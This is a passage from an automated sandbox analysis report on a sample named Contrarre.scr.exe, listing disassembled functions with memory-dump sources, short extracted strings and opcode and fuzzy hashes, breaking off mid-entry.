Opcode Fuzzy Hash: 53bbfb18873a5ece355ec24b24006967ee180857a70a8e0860fafc95fdc4f630
Instruction Fuzzy Hash: 46B1F275E05219DBDB58CFAAD8809DEFBB2BF89300F10956AD415BB264DB349A02CF50

Function 0B8B7998 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

?w=>, xrefs: 0B8B7C64

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ?w=>
API String ID: 0-1933253675
Opcode ID: e6d0924beae397a5013b5bb9210d5d9d38f91b92d1fd4063489ae9419e78e2c4
Instruction ID: aea4262a449373a76165b33e2f533105891446e854d25a77bd6d96459a2ebf04
Opcode Fuzzy Hash: e6d0924beae397a5013b5bb9210d5d9d38f91b92d1fd4063489ae9419e78e2c4
Instruction Fuzzy Hash: A2B1F674E05219DBDB58CFAAD8809DEFBB2BF89300F10956AD415BB364DB349A02CF50

Function 01854360 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

ZV=, xrefs: 01854479

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: ZV=
API String ID: 0-2320326512
Opcode ID: 8c15ee42d277c3b315d4817890b394adeb04470001ae5add3253e08d22f4d0ed
Instruction ID: ad0964e859c1690ebf3bd2332292806fd8032cfc56a765d40ccabc17bd063466
Opcode Fuzzy Hash: 8c15ee42d277c3b315d4817890b394adeb04470001ae5add3253e08d22f4d0ed
Instruction Fuzzy Hash: F981F134E152099FCB48CFA9D5809AEFBF1FF89310B14956AE815EB225D734AA81CF50

Function 01854370 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

ZV=, xrefs: 01854479

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: ZV=
API String ID: 0-2320326512
Opcode ID: 5585d5d60671967a42781a13b8f631c255d4cce779742e55591f8d01b7a0a338
Instruction ID: f9d5a3eefa04a76eaa04d03d6be6970704fd9238c70c318d6c23e6480e931172
Opcode Fuzzy Hash: 5585d5d60671967a42781a13b8f631c255d4cce779742e55591f8d01b7a0a338
Instruction Fuzzy Hash: CC81FF74E152099FCB48CF99D5809AEFBF1FF89310F14956AE819EB221D734AA81CF50

Function 0B8B1B18 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

]]o, xrefs: 0B8B1B77

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ]]o
API String ID: 0-2636374853
Opcode ID: eb091ff06ccafb5d9896aab6fc17dd1a89eb64f80c59a82588a68d0a68630e5d
Instruction ID: bd7dbf6438289cd169ffd91e4bef8dea226169135737b63dbaf4089ba00fe929
Opcode Fuzzy Hash: eb091ff06ccafb5d9896aab6fc17dd1a89eb64f80c59a82588a68d0a68630e5d
Instruction Fuzzy Hash: 90611274E1520A9FCB04DFA9D0989EEFBB1FB89710F14856AD415EB320D734AA42CF90

Function 0B8B1B28 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

]]o, xrefs: 0B8B1B77

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ]]o
API String ID: 0-2636374853
Opcode ID: 08e769b07fcf850500261c5d6efb259f44a66b43e12584f6b23be8cd350c66ef
Instruction ID: 4e0f110f7290d0581e96847bc20a304e7ae9cfa60388ca350c43b47f97401dbc
Opcode Fuzzy Hash: 08e769b07fcf850500261c5d6efb259f44a66b43e12584f6b23be8cd350c66ef
Instruction Fuzzy Hash: C9710074E1120ADBCB04DFA9D098AEEFBB1FB89350F14856AD415BB324D734AA41CF94

Function 018557E0 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

h5, xrefs: 0185595E

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: h5
API String ID: 0-2520748363
Opcode ID: 1f602ca9c57e81fcac3e16586f72e52852dfa93d147bb1fc076fbcad93938fd7
Instruction ID: 87b60a516ca8039b328d3e33beebd93558d3aa002f5c2d73a6d64699b57d9eda
Opcode Fuzzy Hash: 1f602ca9c57e81fcac3e16586f72e52852dfa93d147bb1fc076fbcad93938fd7
Instruction Fuzzy Hash: 3871C074E0560A8FCB44CFA9D9809DEFBF2EF89314F24946AD805F7224D7349A42CB65

Function 01854F20 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

vcT, xrefs: 018550DD

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: vcT
API String ID: 0-2188849356
Opcode ID: ecc170838e2d39d39640bc5cbcd26b6440b3e568a9cb9de80541de0528e89b1a
Instruction ID: c36eaa93468a109aff54e8d640a537e8b61858f9f66ed960527497f089a9cc6b
Opcode Fuzzy Hash: ecc170838e2d39d39640bc5cbcd26b6440b3e568a9cb9de80541de0528e89b1a
Instruction Fuzzy Hash: C771F4B4D0420ADFCB44CF99C5809AEFBB2FF88350F54955AD815EB214D734AA82CFA5

Function 018557D8 Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

h5, xrefs: 0185595E

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: h5
API String ID: 0-2520748363
Opcode ID: 67fdf9bffc234f29d7841d9cf9eb570512e9a772f714d6b5f59339635b28bf73
Instruction ID: 610cb8e740f3dca361647b5539226e0c06809a0900541e9e5462d9f39aa2b33a
Opcode Fuzzy Hash: 67fdf9bffc234f29d7841d9cf9eb570512e9a772f714d6b5f59339635b28bf73
Instruction Fuzzy Hash: A961D174E052098FCB48CFA9D9804EEFBF2EF89314F24946AD805F7224D7349A42CB65

Function 01854F11 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

vcT, xrefs: 018550DD

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: vcT
API String ID: 0-2188849356
Opcode ID: 20e66de099c38f033238403abe8522cc39fa1bc91f7b6106cd3ec811e058d416
Instruction ID: 4f9f44bc93509e1f0612d55a5e755013168f4aef7f8b0f4abd5d0125b37ae286
Opcode Fuzzy Hash: 20e66de099c38f033238403abe8522cc39fa1bc91f7b6106cd3ec811e058d416
Instruction Fuzzy Hash: 8961E474E0420ADFCB44CFA9C5809AEFBB2FF88350F54955AD915E7214D3349A82CFA5

Function 0B8B5CC8 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

i#)6, xrefs: 0B8B5D59

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: i#)6
API String ID: 0-3600651614
Opcode ID: c044748f9046f75abef4f939633c6724b1952a68dad5d997a083b306e4406b69
Instruction ID: 648cb7de674ca1c3788b67d7e2991d8c48168c144a74f35f90bfa3bc7d7c56ed
Opcode Fuzzy Hash: c044748f9046f75abef4f939633c6724b1952a68dad5d997a083b306e4406b69
Instruction Fuzzy Hash: 754147B0E0520ACBCB08CFA6C555AEEFBF2EB99304F24D52AC015E7364E33497418B95

Function 0B8B5CC7 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

i#)6, xrefs: 0B8B5D59

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: i#)6
API String ID: 0-3600651614
Opcode ID: f491bb92945a055b40cff0ae98a0b0fba8d7dfc1f02bb7f92a81d9118607b616
Instruction ID: bc53dbd01bd54c3068d978e24532f76d07b58d73941488c89e505a985a2beb01
Opcode Fuzzy Hash: f491bb92945a055b40cff0ae98a0b0fba8d7dfc1f02bb7f92a81d9118607b616
Instruction Fuzzy Hash: E6413670E0520ADBCB08CFA6D555AEEFBF2EB99204F28942AC015E7364D3349B458B95

Function 01850870 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

6/, xrefs: 0185096E

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: 6/
API String ID: 0-3682508687
Opcode ID: 16437f2a2abf1c2a036feae480d7cc06ee99e30cb3494937bdd80aa3736765b6
Instruction ID: 98a634a28a57ee8a9f4556ef3f12d3aaa570a979f0db9c87544f9f7f024743ff
Opcode Fuzzy Hash: 16437f2a2abf1c2a036feae480d7cc06ee99e30cb3494937bdd80aa3736765b6
Instruction Fuzzy Hash: 2F31E771E046188FEB58CF6AD81079EFBF3BFC9300F14C1AAD858A6225EB340A518F51

Function 0A147B98 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494d0ffd106bb3d5cda1be8f8d9a2faa165b8a5b8924c6f0a2a994af98c7bd5a
Instruction ID: 7dd9ca1c4e610a105a1094fdfe078472a28ec914f12e9c82d9c58569e70eabab
Opcode Fuzzy Hash: 494d0ffd106bb3d5cda1be8f8d9a2faa165b8a5b8924c6f0a2a994af98c7bd5a
Instruction Fuzzy Hash: 5ED1AD70B016148FE725DF79C458BAEB7F6AF88200F14886DD1469B6D0DB35E901CB61

Function 05726158 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472cf18ef7b3bd0bc56c3f22065e45c21716eddc62ca5a6137e5dbf4d18e8722
Instruction ID: 1fb775419f23e73a88e2bb546c6bfa83abf72453aeec56e64659fca6e3f83a49
Opcode Fuzzy Hash: 472cf18ef7b3bd0bc56c3f22065e45c21716eddc62ca5a6137e5dbf4d18e8722
Instruction Fuzzy Hash: 5E1297B05227498AF351DF25E84E1C93FB1B765318F906709E2621B2E1EFB415CACF48

Function 0B8BEA28 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3910bd805ee104836bac0abe6ab8a4f8f58f5bf3dceb5a3db6f28c4adbb486bf
Instruction ID: 0848196e32d59c093b8c20f9e82920f6f0c48dc8d60043d00a9071727e65d3a9
Opcode Fuzzy Hash: 3910bd805ee104836bac0abe6ab8a4f8f58f5bf3dceb5a3db6f28c4adbb486bf
Instruction Fuzzy Hash: B3E10674E002199FDB14CFA9C580AAEBBF2FF88305F24856AD415AB355D731AD81CFA0

Function 0B8BF298 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7fa75534be0fd73af320939fb0ff4a3e01b741132bd90b6559fa10be26ea655
Instruction ID: bb9243746b58e58657cb9aa346be37a4b6bf916a9ec0cb278bd808e557a24c0b
Opcode Fuzzy Hash: a7fa75534be0fd73af320939fb0ff4a3e01b741132bd90b6559fa10be26ea655
Instruction Fuzzy Hash: 59E1C8B4E002199FDB14DFA9C980AAEBBF2FF89305F24816AD514A7355D731AD41CF60

Function 0A140848 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ec1ea2213a572e94b66a02efbff6ee627253b9bbdc781f242b860c905a9d6b
Instruction ID: 4f5a6bd5d102a95a00a2ff3bb82c1c42dfe0d54cc6c57b7f3abecc98bad0ccfd
Opcode Fuzzy Hash: 90ec1ea2213a572e94b66a02efbff6ee627253b9bbdc781f242b860c905a9d6b
Instruction Fuzzy Hash: 87E1F874E002199FDB14CFAAC590AAEBBF2FF88305F24816AD514A7355D735AD42CFA0

Function 0A1411F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85dbec119dfb9c6f6f87b9942f64b201ca63e8f92a53ee4c3fec214891a30c0e
Instruction ID: f05d95b13b741265fbc6a8d2298b98bf15d38ddd7c87c8589be7887e8a22991a
Opcode Fuzzy Hash: 85dbec119dfb9c6f6f87b9942f64b201ca63e8f92a53ee4c3fec214891a30c0e
Instruction Fuzzy Hash: C9E1E874E002199FDB14CFA9C580AAEBBF2FF89305F24826AD454AB355D7719D81CFA0

Function 0572420C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c2c39c1d06539df3d7d7423d2cfa7e380bb3f75196fe607075ab4db7c224b6
Instruction ID: fe5cb9555a8d67a8a7e00da2d370099596eab102e45acd22ad0c8093cd1b403c
Opcode Fuzzy Hash: 21c2c39c1d06539df3d7d7423d2cfa7e380bb3f75196fe607075ab4db7c224b6
Instruction Fuzzy Hash: 41A15E32E00229CFCF05DFA5C8889AEB7F2FF85300B15416AE806AB225DB71E955DF50

Function 018516B1 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040cc05ed73c59490d5bdd26ab4d0861717409fa460eb078315753ab28f6558b
Instruction ID: f02063c8e231a3f5c37960b511d02dee140743a493fa28811339d32b8b82e0a4
Opcode Fuzzy Hash: 040cc05ed73c59490d5bdd26ab4d0861717409fa460eb078315753ab28f6558b
Instruction Fuzzy Hash: 9CB14074E0121ADFDB44DFA9D840A9EF7B2FF88304F108629D415AB365DB70AA46CF81

Function 05726103 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b84d5d8131c9c5a3571dfd6866dfe62ced531e5628b57cada038d5451ad8dc
Instruction ID: b7d0ef062949919a59b4b6c97692cef71e1bb0f6f6f41445a9e39c20a65e2d69
Opcode Fuzzy Hash: 03b84d5d8131c9c5a3571dfd6866dfe62ced531e5628b57cada038d5451ad8dc
Instruction Fuzzy Hash: 5BC107B09217098BF711DF25E84A1C97FB2BBA5324F506719E1626B2D1EFB414CACF48

Function 05726148 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7243293dca210a9c0ae0eea73d4a4923e43b3c7ff3bb11d4d9ef5232c7125f
Instruction ID: 745c019cd523d9d9439c9b12cd590c7b36fbc5f08a25febea93f7eb8e5a0d6b6
Opcode Fuzzy Hash: 3f7243293dca210a9c0ae0eea73d4a4923e43b3c7ff3bb11d4d9ef5232c7125f
Instruction Fuzzy Hash: CBC1F7B09217498BF711DF25E84A1C97FB2BBA5324F506709E1626B2D1EFB414CACF48

Function 018520D0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d37948fc71124a06ccff9135ce2878672560e806903cff508e045601e7d9bd8
Instruction ID: 20b963b51d240630631da7e0aee48633d623f8cd551ec52dbf7bad1b7a51c3da
Opcode Fuzzy Hash: 9d37948fc71124a06ccff9135ce2878672560e806903cff508e045601e7d9bd8
Instruction Fuzzy Hash: 82713674E0160ADFCB44CF99D4809EEFBB2FB89350F14956AE915EB214D734AA42CF90

Function 0B8B51C0 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c043ff66e992c4c2c2beb322136b2496e4f4799a24b327462cd312069b129d
Instruction ID: 69477e877f8d446a3b040f8fd789bcde836865fa2e34870ac3c2d27008a00599
Opcode Fuzzy Hash: 34c043ff66e992c4c2c2beb322136b2496e4f4799a24b327462cd312069b129d
Instruction Fuzzy Hash: D3611374E0520ACFDB04CFA9D5909DEFBF2EF99210F24942AD415F7364E3719A428B64

Function 0B8B51D0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9487863db0b785806f7315c17e0cda039b98bad89afa8e224891ba436c46887a
Instruction ID: 44099bb45c56ca027f35eff148d50a352cab6de541476774ac39f351147e2ebe
Opcode Fuzzy Hash: 9487863db0b785806f7315c17e0cda039b98bad89afa8e224891ba436c46887a
Instruction Fuzzy Hash: 2171F274E0520ACFDB04CFA9D5909DEFBF2EF89210F24942AD415F7324E7709A418B64

Function 0B8BEA0E Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba65970da712345eb18072416215d1e799a78be59b51df96aa40b3359d0b5035
Instruction ID: f0180fb1e56c8e8931ec247b6621542e9843e02e12b4a6fefa7a15dfb986008f
Opcode Fuzzy Hash: ba65970da712345eb18072416215d1e799a78be59b51df96aa40b3359d0b5035
Instruction Fuzzy Hash: 60511770E002198FDB15CFA9C5809EEBBF2FF89205F1485AAD408AB356D7309D41CFA1

Function 0B8B6458 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7aa4f6a100b67eeb52e8a594b8d3ec277bd9b56f9754f9f6bd4932ce7598ba6
Instruction ID: e469bfa21d63894158d4a59ae6b898c32399f7b5ffbd2c822a697c83fe50eb68
Opcode Fuzzy Hash: d7aa4f6a100b67eeb52e8a594b8d3ec277bd9b56f9754f9f6bd4932ce7598ba6
Instruction Fuzzy Hash: 19510670D05A1ADFCB08CFA6D440AEEFBF1AF89200F18956AC015B7364E33896428F65

Function 0B8B6468 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32292772978c7601c28161114a781a2f6c667601b4975cfea9d9431ec2c9332
Instruction ID: b899d7ea8ce94f3829201dba773a703566578ae9ca54622b27e3aec2836ca839
Opcode Fuzzy Hash: f32292772978c7601c28161114a781a2f6c667601b4975cfea9d9431ec2c9332
Instruction Fuzzy Hash: 5851F674D05A1EDFCB08CFA6D440AEEFBF1AB89200F58952AC425B7324E37896118F65

Function 0A140839 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c98b47fd6b112a1b1fd2770d7c7f69a4be5313c1618a3103965a6e1a83e70077
Instruction ID: 4682f0c8ce2f384bf32c5b4291a5f8e3dcd0ead10a4864fff55228620cce9893
Opcode Fuzzy Hash: c98b47fd6b112a1b1fd2770d7c7f69a4be5313c1618a3103965a6e1a83e70077
Instruction Fuzzy Hash: 13510870E042198FDB14CFAAC5906AEFBF2FF89304F24816AD448A7256D7359D42CFA1

Function 01855618 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5d24c58ade098d24e939c6080a04099cda654fe4933b4c75fa12da3cb9dd94
Instruction ID: 92a9023db7ef18185535db4c7004de9639c1982bdc6c4925a475bd471a13753a
Opcode Fuzzy Hash: 3a5d24c58ade098d24e939c6080a04099cda654fe4933b4c75fa12da3cb9dd94
Instruction Fuzzy Hash: 4041E7B0E0560ADFDB44CFA9D4815AEFBF2EF89314F14D46AC815E7264D3349A428FA1

Function 01855628 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66cf54eb2a266e77c2a6df6fe17633bd584f0e084e188133c4d55867aac32601
Instruction ID: 069e12293b9a76fa5810cec2dd555f99a83a6c7d8b51449e13bcbddd606586af
Opcode Fuzzy Hash: 66cf54eb2a266e77c2a6df6fe17633bd584f0e084e188133c4d55867aac32601
Instruction Fuzzy Hash: 4841E8B0E0460ADBDB44CFAAD4815AEFBF2FF88304F14D46AC815E7224D3349A458FA5

Function 0B8B4FA1 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f22956c2b47d7800117c5d6b22dd4ff02c4ba1bef8f56e5918a4f14f519e26
Instruction ID: 797580817e7b92bdc2c22a56fb2a7566380b51be398ba50fc5a8c310a868c43f
Opcode Fuzzy Hash: 81f22956c2b47d7800117c5d6b22dd4ff02c4ba1bef8f56e5918a4f14f519e26
Instruction Fuzzy Hash: F541D570D0520A9FDB44CFAAC5819EEFBF2AF88300F24C46AC415E7365D7349A468FA5

Function 0B8B4FB0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd45c035fba9859771c01f75fe5ab3ce751886a72d9b7be5b10af58cbe1f020e
Instruction ID: e4449599ae62d0ea69f5856e83a860621a6b3eaf62666527ae7dd5e89b0b50e7
Opcode Fuzzy Hash: cd45c035fba9859771c01f75fe5ab3ce751886a72d9b7be5b10af58cbe1f020e
Instruction Fuzzy Hash: F941C6B0D1560A9BDB44CFAAC5819EEFBF2FB98300F24C46AC415E7354D7349A428FA5

Function 01855A50 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2012c6fd43f417cc37750729fa8307afb27470c95d5c4df0b022fb43741a585e
Instruction ID: 092746afc56a8cb5ad8553cc981106b38445871b98a06bf39cb8050b9f21d7b1
Opcode Fuzzy Hash: 2012c6fd43f417cc37750729fa8307afb27470c95d5c4df0b022fb43741a585e
Instruction Fuzzy Hash: 3941D3B0E0520A9FDB44CFA9C5805AEFBF2FF88354F24C56AC915A7214D7349A418F95

Function 0B8B0006 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc236824a5431bfb5e2d450b621b8a136c22aa9f288cf99740408c6de3ece395
Instruction ID: 859a6c12ed4d05d872cc723ab7d3f61fc7dd119cf90220ff5099d3241ac862e7
Opcode Fuzzy Hash: bc236824a5431bfb5e2d450b621b8a136c22aa9f288cf99740408c6de3ece395
Instruction Fuzzy Hash: 7631DD71D057988FDB59CF7B885069ABBF3AFCA204F09C4AAC444AB265D7341946CF21

Analysis Process: Contrarre.scr.exePID: 7756, Parent PID: 7392COMMON

Executed Functions

Function 0146C530 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 0146F910

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 8e526f73534d2e160067c937ff5667929cd806c2ab9ee341275a51be2f90dfda
